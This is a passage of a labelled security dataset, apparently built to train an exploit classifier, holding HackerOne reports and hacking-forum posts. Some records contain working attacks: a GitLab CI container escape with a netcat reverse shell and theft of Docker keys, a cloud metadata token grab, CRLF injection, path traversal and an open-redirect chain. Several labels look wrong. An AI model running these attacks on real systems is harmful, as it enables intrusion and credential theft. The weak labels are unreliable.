name=\"idProvincia\"\n\n0\n-----------------------------297392175112058187932062474594\nContent-Disposition: form-data; name=\"idLocalidad\"\n\n0\n-----------------------------29739217511205818793206247", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-06-23", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "4b1b115fa4bd573d32a9", "text": "[Unknown] Python : Add query to detect PAM authorization bypass\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-03-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "b9d84bad1a6ff6d7c781", "text": "Now that anti virus scanners respond quickly to every newly created backdoor, you need to be creative and go through the back door. Here’s an example of how discord is used to access someone else’s computer: GitHub - 3ct0s/discord-keylogger: Undetectable Keylogger that reports to Discord", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackersploit", "forum_id": "hackersploit", "timestamp": "2022-02-12", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "501d6646f87d29084034", "text": "[Unknown] Issuer not verified from obtained token in user_oidc\n\nAs per OIDC spec the issues of the token should be verified to match the issuer obtained in the discovery phase.\nhttps://openid.net/specs/openid-connect-core-1_0.html#IDTokenValidation (step 2)\n\nVery similar to the aud check in https://github.com/nextcloud/user_oidc/blob/main/lib/Controller/LoginController.php\n\nThere are some more steps in that document that I don't think are currently implemented correctly.\nHowever I do not have an OIDC setup to check/verify. So might be worth it to have a look.\n\n## Impact\n\nWithout verifying the issuer a MITM is possible.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-08-23", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "99dbd4d8d9d5c440ba54", "text": "Other than controlling the drone via keyboard, not much. I’ve been stuck on decoding the video for weeks haha. Seems like the App is using Ffmpeg, AVPlayer, EglView, Opencv, CNN, and etc. Idk if it’s helping. I’ve read many articles about “hacking” bunch of drone. And their way of accesing the video stream so simple. Idk why it’s hard in this case haha. I thought that the drone is encapsulating the stream using something like RTP but after testing, the packet send using RTP doesn’t match what the drone have sent. Now i’m stuck. Still researching sending video over udp tho, will reply when i’ve found the solution.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-11-26", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "9cf7bd7c880b7f2e45be", "text": "Thank you so much dude. I can’t believe this actually worked. You’re the best.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-10-21", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "0cdf0030ac1cf24becc2", "text": "[Unknown] Cargo not respecting umask when extracting crate archives\n\nCargo did not properly protect files in the cargo registry. When an archive contained files which were marked as globally writeable, they would be unpacked as-is and retain their global writeability. This is CWE-278 (not available in HackerOne).\n\nThis was discovered as part of a (personal) routine file permissions check:\n\n```sh\nfind / ! -type l -perm -002 -exec ls -alhd {} \\;\n```\n\n## Impact\n\nA local attacker may inject arbitrary code into the cached files present in the cargo registry. This, in turn, allows for a local attacker to act as the targeted user (when the user compiles the modified code) or to poison prebuilt binaries built by that user and thus have arbitrary code execution against downstream users (supply chain attack).", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-08-15", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "752d16c068d8b5a64fa0", "text": "[CRLF Injection] Header CRLF Injection in Ruby Net::HTTP\n\nThere is a Header CRLF Injection vulnerability in Ruby Net::HTTP.\nWhen I run the following code:\n```\nrequire 'net/http'\n\nhttp = Net::HTTP.new('127.0.0.1', 6379)\nheaders = {\n \"test\\r\\nSET VULN POC \\r\\n\" => \"test\",\n}\nresp, data = http.get(\"/\", headers)\n```\nThe service on port 6379 will receive the following packet:\n```\nGET / HTTP/1.1\nTest\nset vuln poc\n: test\nAccept-Encoding: gzip;q=1.0,deflate;q=0.6,identity;q=0.3\nAccept: */*\nUser-Agent: Ruby\nConnection: close\nHost: 127.0.0.1:6379\n```\nThis means that if an attacker can control the header name, he can inject arbitrary content into the HTTP request. This is very dangerous.\n\n## Impact\n\nIf port 6379 is running the Redis service, the attacker can directly execute the Redis command. So this vulnerability can be used to attack internal services like Redis etc.\n{F1963847}", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-04", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "bc508ef2ce1fbc21b4a8", "text": "[HTTP Request Smuggling] CVE-2022-32215 - HTTP Request Smuggling Due to Incorrect Parsing of Multi-line Transfer-Encoding\n\nOriginal Report: https://hackerone.com/reports/1501679\n\n## Impact\n\nDepending on the specific web application, HRS can lead to cache poisoning, bypassing of security layers, stealing of credentials and so on.", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2022-32215"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-07-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "e0051327b3d38a14e55d", "text": "[Improper Access Control - Generic] Able to take over .zyrosite.com subdomains via `/v3/publish/connect-domain-hostinger` API endpoint\n\n## Summary:\nHey team, I was able to take over *anysubdomain*.zyrosite.com via https://builder-backend.hostinger.com/v3/publish/connect-domain-hostinger endpoint.\n\nI was connected following subdomains to my site for confirming this vulnerability, ;\n`test.zyrosite.com` and `connect.zyrosite.com` ( this was my fault )\n\nyou'll see a text like`tosun pwn` on these subdomains, but If you follow the below steps, you can also connect your site to test.zyrosite.com`\n\n## Steps To Reproduce:\n\n> ###`you need to single shared hosting service to reproduce this issue`\n\n1. Login to your hostinger account from hpanel.hostinger.com\n2. Create a website then go to website builder / editor ( you'll be go to like this https://builder.hostinger.com/{siteId} )\n3. Publish your site with top right button\n\nNow get your cookies and paste to below HTTP request\n\n```\nPOST /v3/publish/connect-domain-hostinger HTTP/2\nHost: builder-backend.hostinger.com\nCookie: {use your cookies on builder page)\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0\nAccept: application/json\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/json\nContent-Length: 61\nOrigin: https://builder.hostinger.com\nReferer: https://builder.hostinger.com/\nTe: trailers\n\n{\"domain\":\"test.zyrosite.com\",\"siteId\":\"{yourSiteId}\"}\n``` \n\nmy hostinger account email: █████\nmy siteId: `█████`\n\n## Impact\n\nable to takeover *.zyrosite.com subdomains.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-12-05", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "b09e70a38abcc37c2a01", "text": "[Deserialization of Untrusted Data] RCE vulnerability in Hyperledger Fabric SDK for Java\n\n[Hyperledger Fabric SDK for Java version 2.0.0](https://github.com/hyperledger/fabric-sdk-java/tree/v2.0.0) and earlier does not configure its YAML parser to prevent the instantiation of arbitrary types, resulting in a remote code execution vulnerability.\n\nIn the following source code files and corresponding line number, an arbitrary file gets parsed by SnakeYAML which allows to construct a Java object of any type, leading to remote code execution.\n- fabric-sdk-java/src/main/java/org/hyperledger/fabric/sdk/ChaincodeCollectionConfiguration.java line 121\n- fabric-sdk-java/src/main/java/org/hyperledger/fabric/sdk/NetworkConfig.java line 301\n- fabric-sdk-java/src/main/java/org/hyperledger/fabric/sdk/ChaincodeEndorsementPolicy.java line 241 and 262\n- fabric-sdk-java/src/main/java/org/hyperledger/fabric/sdk/LifecycleChaincodeEndorsementPolicy.java line 228\n\nObjects should be limited such as limiting to standard Java objects like List or Long by using SafeConstructor.\n```\nYaml yaml = new Yaml(new SafeConstructor());\n```\n\nMore info on Snake YAML can be found on the following url: https://bitbucket.org/asomov/snakeyaml/wiki/Documentation#markdown-header-loading-yaml\n\n## Impact\n\nRemote Code Execution vulnerability", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-08-06", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "179fa4423ad83ea987d7", "text": "There are methods that can be bypassed. “Vendors have to install UM hooks in each process since Microsoft doesn’t provide a legitimate way for components to receive notifications about memory operations.” In response to this, various techniques to circumvent them have been devised and what follows is a brief description and source code in C to demonstrate some of those methods currently being used.The address table is exported. The address of system calls can be resolved using a combination of GetModuleProc and GetHandleAddress. It is possible to manually locate NTDLL. The system call can be found through the dll in the Process Environment Block. The code you see is used to read the EAT.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hacker_exploits", "forum_id": "zerosec", "timestamp": "2022-03-29", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "8665d3baaa3642ffc478", "text": "[Improper Access Control - Generic] Container escape on public GitLab CI runners\n\n### Summary\n\nIt is possible to circumvent the isolation in place for build jobs running on public CI runners by escaping the docker container running the build job.\nThis is possible via abuse of the cgroup release_agent functionality, made possible by CI jobs being allowed to mount filesystems inside the container.\n\nFrom this host, I was able to spawn a root remote shell and run whatever I liked without restriction, including bypassing the iptables rules put in place to prevent access to the GCP metadata API. I was also able to gather sensitive data such as the instance token, GCP project ID and instance configuration, docker host TLS keys, firewall details, suricata configuration and user account names for the ops team, which could aid in further exploitation for a motivated attacker.\n\n### Steps to reproduce\n\n1. Sign up for a regular, free GitLab account.\n2. Create a new project.\n An example repo is here: https://gitlab.com/ec0bb/citest (made private)\n3. Add the below `.gitlab-ci.yaml`\n```\nimage: python:latest\nrun:\n script:\n - bash shell.sh\n```\n4. Add the below `shell.sh`\n```\nexport HOST=your.reverse.shell.box # customise this!\n\nmkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x\necho 1 > /tmp/cgrp/x/notify_on_release\nexport host_path=`sed -n 's/.*\\perdir=\\([^,]*\\).*/\\1/p' /etc/mtab`\necho \"$host_path/cmd\" > /tmp/cgrp/release_agent\n\ntouch /user/txt\ntouch /ca.pem\ntouch /server.pem\ntouch /server-key.pem\ntouch /ps.txt\necho '#!/bin/sh' > /cmd\necho \"whoami > $host_path/user.txt\" >> /cmd\necho \"ps uax > $host_path/ps.txt\" >> /cmd\necho \"cat /etc/docker/ca.pem > $host_path/ca.pem\" >> /cmd\necho \"cat /etc/docker/server.pem > $host_path/server.pem\" >> /cmd\necho \"cat /etc/docker/server-key.pem > $host_path/server-key.pem\" >> /cmd\necho \"mount -o bind /var/run/docker.sock $host_path/docker.sock\" >> /cmd\necho \"/usr/bin/nc $HOST 1337 -e /bin/sh &\" >> /cmd\nchmod a+x /cmd\n\nwhile test 1\ndo\n sh -c \"echo \\$\\$ > /tmp/cgrp/x/cgroup.procs\"\n sleep 60\ndone\n```\n5. Push the files to the repository.\n6. Enable CI/CD jobs on the repository, in case they aren't, using the `.gitlab-ci.yml` in the repository.\n7. Set up a reverse shell listener with `nc -lvp 1337` on the host you specified in the bash script above.\n8. Run the job\n\n### Impact\n\nBased on the host configuration, there is a clear expectation that CI jobs should not have access to the host, given the use of $DOCKER_USER in the firewall rules, and the configuration in place to prevent access to GCP metadata and host configuration in the way the container is configured. \n\nBeing able to break this confinement allows for unconstrained resource usage on the CI host, as well as access to GCP resources and also other hosts on the internal GCP network. It is also possible to disable iptables and suricata entirely - so arbitrary software and docker images can also be downloaded and run, to facilitate things like cryptocoin mining, something the host has been configured to try and prevent via iptables and suricata rules. This could be used by an attacker to consume significant compute resources in the form of bandwidth usage and compute time, given how easy it is to spin up multiple GitLab accounts, and to restart jobs programmatically when the maximum execution time is reached.\n\nI did not see any evidence of shared jobs in my testing, however if multiple jobs were scheduled on a dedicated runner (which I did not test) then this could also lead to a loss of confidentiality between jobs, as the full container configuration and contents are accessible once the container is escaped.\n\n### Examples\n\nRepo: https://gitlab.com/ec0bb/citest\n\nGCP access (albeit limited) -\n```\ncurl -H 'Metadata-Flavor:Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token\n{\"access_token\":\"ya29.c.b0AXv0zTPHcDsuE3JOIVaFex7mGac13DuX3nI8XvoeSTANd0HfWmJ8BaTiE0P8GGRBVjOH3--Bangi4UVHqBpR7hLsfielnvZd5VWsRVM9xedCsFchJ1VlIl_RHRAgndu79QhAdEtquGQ9FVw8K_v-beS5zXMSh2DZNEfrUx6IgkAF3sk", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-27", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "433b7a4f4d991650be7a", "text": "[Code Injection] https://www.wotif.com/vc/blog/info.php script is prone to reflected HTML/CSS injection and COOKIE leak\n\n## Summary:\nHi,\nI've found that https://www.wotif.com/vs/blog/info.php script is prone to reflected HTML/CSS injection and COOKIE leak. I don't know what is the purpose of that script, however looks like it caches for ~1h a last request over HTTP GET with all HTTP headers send by user + some headers send by Akamai. I'm not sure if there is any sensitive Akamai headers there (some headers reported by that scripts reveal a IP addresses from private network), but I'm sure that malicious actor may inject in that way some HTML/CSS code. As style and form are accepted so attacker probably could use that vulnerability for e.g. phising attack.\nFortunately - despite of many attempts I was unable to exploit this vulnerability as XSS - Akamai WAF protects that endpoint from XSS (at least as long as new bypass method is not found :))\n\nSecond problem with that script is related to HTTP_COOKIES header. As I mentioned before, this script caches all HTTP headers of visitor for ~1h, so if attacker convince the victim to visit that page, then victim cookies will be cached by script and visible to anybody who visit this script after victim.\n\nCurrent response:\n```\nTEMP => /tmp\nTMPDIR => /tmp\nTMP => /tmp\nPATH => /usr/local/bin:/usr/bin:/bin\nHOSTNAME =>\nUSER => nginx\nHOME => /var/lib/nginx\nHTTP_X_DATADOG_SAMPLING_PRIORITY => 0\nHTTP_X_DATADOG_PARENT_ID => 2356387789306272938\nHTTP_X_DATADOG_TRACE_ID => 2570661382097469643\nHTTP_CGP_AGENT_IDS_DUAID => 0c8072a3-7d9b-4be1-bbcf-d2acaaf8c627\nHTTP_CTX_USER_TUID => -1\nHTTP_CTX_USER_STATE => single-use\nHTTP_CTX_SITE_CURRENCY => AUD\nHTTP_CTX_SITE_EAPID => 0\nHTTP_CTX_SITE_TPID => 70125\nHTTP_CTX_SITE_LOCALE => en_AU\nHTTP_CTX_SITE_ID => 70125\nHTTP_CTX_PARTNER_ACCOUNT_ID => d34ca89e-4f80-4815-8057-b91672192b53\nHTTP_CTX_PRIVACY =>\nHTTP_CTX_AGENT_DEVICE_ID => 0c8072a3-7d9b-4be1-bbcf-d2acaaf8c627\nHTTP_EDGE_AGENT_TRAITS_CLASSIFICATION => UnknownBot\nHTTP_EDGE_AGENT_TRAITS_ALIGNMENT_SCORE => 0.0\nHTTP_EDGE_AGENT_TRAITS_BOTNESS_SCORE => 1.0\nHTTP_EDGE_AGENT_GEOLOCATION_INFO => {\"latitude\":50.27,\"longitude\":19.02,\"countryCode\":\"PL\",\"regionCode\":\"\",\"city\":\"KATOWICE\",\"continent\":\"EU\",\"postalCode\":\"\",\"timezone\":\"+01:00\",\"metroCode\":-1}\nHTTP_EDGE_AGENT_DEVICE_INFO => {\"brandName\":\"cURL\",\"modelName\":\"cURL\",\"isTablet\":false,\"isMobile\":false,\"resolutionHeight\":600,\"resolutionWidth\":800,\"physicalScreenHeight\":400,\"physicalScreenWidth\":400,\"type\":\"DESKTOP\"}\nHTTP_EDGE_AGENT_IP => 89.74.158.194\nHTTP_X_EXPEDIA_TPID => 70125\nHTTP_CGP_AGENT_GEOLOCATION_INFO => {\"latitude\":50.27,\"longitude\":19.02,\"countryCode\":\"PL\",\"regionCode\":\"\",\"city\":\"KATOWICE\",\"continent\":\"EU\",\"postalCode\":\"\",\"timezone\":\"+01:00\",\"metroCode\":-1}\nHTTP_CGP_AGENT_TRAITS_BOTNESS_SCORE => 1.0\nHTTP_CGP_AGENT_TRAITS_CLASSIFICATION => UnknownBot\nHTTP_X_CGP_ENV => ewecgp-prod\nHTTP_X_CGP_REGION => eu-west-1\nHTTP_CGP_AGENT_DEVICE_ID => 0c8072a3-7d9b-4be1-bbcf-d2acaaf8c627\nHTTP_CGP_AGENT_TRAITS_ALIGNMENT_SCORE => 0.0\nHTTP_X_EXPEDIA_EAPID => 0\nHTTP_X_EXPEDIA_SITE_ID => 70125\nHTTP_CGP_ROUTE_APPLICATION => seo-vendor-content-wotif-blog\nHTTP_X_CLOUD_GATE_DESTINATION_ID => seo-vendor-content-wotif-blog\nHTTP_CGP_ROUTE_ENDPOINT => seo-vendor-content-blog\nHTTP_X_BONO_CONFIDENCE => 100\nHTTP_X_BONO_RULES_EXECUTED => -\nHTTP_X_BONO_CLASSIFICATION => UnknownBot\nHTTP_COOKIE => MC1=GUID=0c8072a37d9b4be1bbcfd2acaaf8c627; DUAID=0c8072a3-7d9b-4be1-bbcf-d2acaaf8c627; HMS=c7e5fe2f-8c58-4e65-b97a-5c9f8f7371a9\nHTTP_DEVICE_USER_AGENT_ID => 0c8072a3-7d9b-4be1-bbcf-d2acaaf8c627\nHTTP_X_B3_SAMPLED => 1\nHTTP_X_B3_SPANID => bb92594475e89bbe\nHTTP_X_B3_TRACEID => 1557eb34142c42509d22dfee3abe67b7\nHTTP_MESSAGE_ID => 00000000-0000-0000-bb92-594475e89bbe\nHTTP_TRACE_ID => 1557eb34-142c-4250-9d22-dfee3abe67b7\nHTTP_X_CGP_INSTANCE => i-0f45203154581aa55\nHTTP_X_FORWARDED_PROTO => https\nHTTP_X_CGP_REQUEST_ID => 0838fecf-b682-11ed-a11c-0242edcb948b\nHTTP_VIA => 1.1 v1-akamaitech.net(ghost) (AkamaiGHost), 1.1 akamai.net(ghost) (AkamaiGHost), 1.1 styx\nHTTP_X_FORWARDED_HOST => www.wotif.com\nHTTP_X_FO", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-20", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "26d50eb27f9deb90ce65", "text": "[Cross-site Scripting (XSS) - Stored] XSS in redditmedia.com can compromise data of reddit.com\n\n# Description\n\nHi, i would like to report a XSS in redditmedia.com that can affect the reddit.com application. In redditmedia.com domain we are in the domain that reddit.com use to get all the thumbmails of any post.\n\nI found that redditmedia.com/gtm/jail uses the \"id\" parameter to get a valid GTM id and import it from google tag manager. With that, I can create a google tag manager account, create my own html and generate a valid GTM id to be introduced at redditmedia.com/gtm/jail.\n\nI created a gtm with the content ` ` and it worked. The XSS was triggered. You can check using the id `GTM-KM2VT3H`.\n\nI discovered two scenarios that can affect reddit.com, one of which is making this XSS make a cookie bomb, creating a large amount of cookies for .redditmedia.com that will make the service unavailable to the user (only for the user who accesses the malicious GTM page)\n\nThe PoC for this case is as follows:\n```\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n` element, but `t.value` as `href` attribute and then - takes `host` attribute of created URL. This approach is of course way better than some regexp magic ;-) but there's a behavior specific in Safari browser:\n\n```\n> var a = document.createElement(\"a\")\n> a.href=\"javascript://google.com/%0aalert(document.domain);//\"\n> console.log(a.host)\n< google.com\n```\n\nAll other browsers return empty string in case of using `javascript:` scheme, but not Safari. :) This could lead attacker to use `javascript` schema and execute javascript code in top window (victim's blog)\n\n\n## Steps To Reproduce:\n\n1. Get evil wordpress instance ;-) \n2. Edit `wordpress/wp-includes/theme-compat/embed.php` file and add your custom HTML code:\n\n```html\n\n```\n3. Create any po", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-07-01", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "bdecff49f441bf3998dd", "text": "[Security Through Obscurity] Chained open redirects and use of Ideographic Full Stop defeat Twitter's approach to blocking links\n\n**Summary:** A chain of two open redirects (on `analytics.twitter.com` and `twitter.com`), coupled with the use of an Ideographic Full Stop allows an attacker to defeat [Twitter's approach to blocking links](https://help.twitter.com/en/safety-and-security/phishing-spam-and-malware-links).\n\n**Description:** Twitter maintains a deny list of domain names and prevents users from tweeting (direct or indirect) links to those domains. Most notably perhaps, Twitter recently added (tsk tsk...) `ddosecrets.com` to that deny list. The link validation performed by the backend is a black box (not documented anywhere public, as far as I know). However, I have found a way to defeat it. By combining the following two open (one internal, one external) redirects,\n\n* `https://twitter.com/login?redirect_after_login=ONLY_TWITTER_SUBDOMAINS_ALLOWED_URL`\n* `https://analytics.twitter.com/daa/0/daa_optout_actions?action_id=4&rd=ARBITRARY_URL%3F` (note the URL-encoded question mark at the end)\n\nand using an [Ideographic Full Stop](https://unicode-table.com/en/3002/) in place of the ASCII period in the malicious target URL, it's possible to craft a URL that redirects to the forbidden domain name but that Twitter allows users to post in tweets.\n\n## Steps To Reproduce:\n\n 1. Choose the target URL; let's take `https://ddosecrets.com` as an example.\n 2. Replace all occurrences of the ASCII period by the URL-encoded version of the [Ideographic Full Stop](https://unicode-table.com/en/3002/), i.e. `%E3%80%82`: `https://ddosecrets%E3%80%82com`.\n 3. URL-encode the result of step 2: `https%3A%2F%2Fddosecrets%25E3%2580%2582com`.\n 4. Append the result of step 3 to `https://analytics.twitter.com/daa/0/daa_optout_actions?action_id=4&rd=` and append `%3F` to the result: `https://analytics.twitter.com/daa/0/daa_optout_actions?action_id=4&rd=https%3A%2F%2Fddosecrets%25E3%2580%2582com%3F`.\n 5. URL-encode the result of step 4: `https%3A%2F%2Fanalytics.twitter.com%2Fdaa%2F0%2Fdaa_optout_actions%3Faction_id%3D4%26rd%3Dhttps%253A%252F%252Fddosecrets%2525E3%252580%252582com%253F`.\n 6. Append the result of step 5 to `https://twitter.com/login?redirect_after_login=`: `https://twitter.com/login?redirect_after_login=https%3A%2F%2Fanalytics.twitter.com%2Fdaa%2F0%2Fdaa_optout_actions%3Faction_id%3D4%26rd%3Dhttps%253A%252F%252Fddosecrets%2525E3%252580%252582com%253F`.\n 7. Log in to Twitter and tweet the URL resulting from step 6. Posting the tweet will succeed (but it shouldn't, if link validation were effective).\n 8. Click the malicious link in the tweet you just posted; you'll get redirected to the forbidden domain without being shown any Twitter interstitial page.\n\n(If you're not logged in to Twitter when you click the malicious link, you'll get prompted to log in, but you will still get redirected to the forbidden domain afterwards.)\n\n## Supporting Material/References:\n\nSee attached proof-of-concept video.\n\n## Impact\n\nAttackers can defeat [Twitter's approach to blocking links](https://help.twitter.com/en/safety-and-security/phishing-spam-and-malware-links) and post arbitrary unsafe links (starting with `https://twitter.com`, which really compounds the problem) in tweets.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-12-29", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "0a24d40a17e31d499064", "text": "[Unknown] [Python] Unsafe Unpacking and TarSlip bug slaying\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-06-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "f57c902a50d0e7ccd3c4", "text": "[Cross-site Scripting (XSS) - Generic] Rails ActionView sanitize helper bypass leading to XSS using SVG tag.\n\nIn the specific configuration, it was possible to bypass HTML sanitization by using the `use` tag of the `SVG` element.\n\nIn the `index.html.erb`:\n\n```ruby\n<%= sanitize \"\", tags: %w(svg use) %>\n```\n`use` tag allows to embed another base64 encoded `SVG` containing target XSS payload, base64 after decoding:\n\n```svg\n\n\n\n```\n`SVG` and `use` tags had to be allowed either in global configuration `config.action_view.sanitized_allowed_tags = ['svg', 'use']`\nor inline with `tags` argument of the helper.\n\n## Impact\n\nXSS could lead to data theft through the attacker’s ability to manipulate data through their access to the application, and their ability to interact with other users, including performing other malicious attacks, which would appear to originate from a legitimate user. These malicious actions could also result in reputational damage for the business through the impact on customers’ trust.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-01-29", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "882ce4afa288ee9e0cf9", "text": "Thank you everybody, this topic helped a lot. Another hint, there are 3 fields with = that could be used on the injection. Make sure to test all of them.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-04-26", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "9c513c97ca62c66ca4e1", "text": "[SQL Injection] Sql Injection At █████████\n\n**Description:**\nHi Security Team I Hope You Are Doing Well \n\nSql Injection is a common attack vector that uses malicious SQL code for backend database manipulation to access information that was not intended to be displayed.\n\n\n1: Visit This Endpoint `` https://█████/ `` As You Can See This Website Using Asp.net That's Mean To Os Equal Windows.\n2: Visit This Endpoint `` https://█████/ProductMaps/PubForm/Details.aspx?PUB_ID=4568 `` As You Experienced Sometimes To Check The Parameters Put`` ' `` To Know Vulnerable Or Not , If You Put `` ' `` In This Request As `` https://████████/ProductMaps/PubForm/Details.aspx?PUB_ID=4568' `` The Response Said Invalid Request Means To Maybe Vulnerable.\n3: So I Decided To Sure That This Endpoint Vulnerable To Sql Injection Or Not , I Using Sqlmap As You Can See In My PoC Video.\n\n## References\n\n███\n\n## Impact\n\nThe impact SQL injection can have on a business is far-reaching. A successful attack may result in the unauthorized viewing of user lists, the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to a database, all of which are highly detrimental to a business.\n\n## System Host(s)\n████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\n1: Visit This Endpoint `` https://███████/ `` As You Can See This Website Using Asp.net That's Mean To Os Equal Windows.\n2: Visit This Endpoint `` https://██████/ProductMaps/PubForm/Details.aspx?PUB_ID=4568 `` As You Experienced Sometimes To Check The Parameters Put`` ' `` To Know Vulnerable Or Not , If You Put `` ' `` In This Request As `` https://██████/ProductMaps/PubForm/Details.aspx?PUB_ID=4568' `` The Response Said Invalid Request Means To Maybe Vulnerable.\n3: So I Decided To Sure That This Endpoint Vulnerable To Sql Injection Or Not , I Using Sqlmap As You Can See In My PoC Video.\n\n\nThanks And King Regards\n\n## Suggested Mitigation/Remediation Actions", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-01-06", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d075c244d65323976ab6", "text": "[Cross-site Scripting (XSS) - Stored] Authenticated path traversal to Stored XSS and Denial-of-Service\n\n# Denial-of-Service\nThe vulnerabiity lies on the line `552` of `acp_icons.php`file, when importing emoji from a file we can tell phpBB which file to import from via the paramter `pak`, without any sanitization, the `pak` paramter gets passed dirrectly to `file` the file function, which attemp to read the content of the file to an array.\n{F2705838}\nBecause of the check, reading files like /etc/passwd would not be possible, but if we try to read files like /proc/self/fd/1, the request will hang, a TCP connection will be kept open, the will bring lots of burden to the server. More over, in the case when phpBB is behind a proxy, which may process concurrent request one by one, in this case, if the previous request has not finished, the the rest of requests will have to wait for it to timeout, causing a Denial-of-Service\n\nIn the progress of testing, i use the default HTTP server of PHP, which simulate exactly what a one-by-one request processing proxy would do.\nRequest:\n```\nPOST /adm/index.php?i=acp_icons&mode=smilies¤t=delete HTTP/1.1\nHost: 127.0.0.1:8082\nsec-ch-ua: \"Chromium\";v=\"113\", \"Not-A.Brand\";v=\"24\"\nsec-ch-ua-mobile: ?0\nsec-ch-ua-platform: \"Windows\"\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: navigate\nSec-Fetch-User: ?1\nSec-Fetch-Dest: document\nContent-Type: application/x-www-form-urlencoded\nReferer: http://127.0.0.1:8082/adm/index.php?i=acp_icons&mode=smilies\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nCookie: csrftoken=Ky6rB5uThxl3PwYd6EScmT9WXYiH6rGe; sessionid=hmrhwwo5hj5abu4kqgln2let1x9zudbr; phpbb3_83bmg_u=2; phpbb3_83bmg_k=zalvonnyh1lr16og; phpbb3_83bmg_sid=3ba797a8668f6db1639ac6939d91f96e\nConnection: close\nContent-Length: 137\n\naction=import&pak=../../../../../../../../../proc/self/fd/1&form_token=b2655d5f0c9edb201328b799a61777b26cef16a5&creation_time=1694960302\n```\nResult timed-out and no response received:\n{F2705858}\n\nThis vulnerability can also help an authenticated attacker know which file exist on server by observe the response message, if the file is not found, the error from `$user->lang['PAK_FILE_NOT_READABLE']` would trigger and result in different message than `$user->lang['WRONG_PAK_TYPE']`(when the file exist but has invalid format)\n# Stored XSS\nWhen testing the emoji import, i also observe that the `SMILEY_IMG` isn't sanitized or escaped\n{F2705870} \nSo we can import a malicious emoji file containing the XSS payload, everyone who access the sites (posting section, comment section, admin section, ...) that emoji presents will trigger the XSS payload, leading to web defacement, cookie stealing, malware attack, ... \n```\n'icon_e_biggrin.gif', '15', '17', '1', 'Very 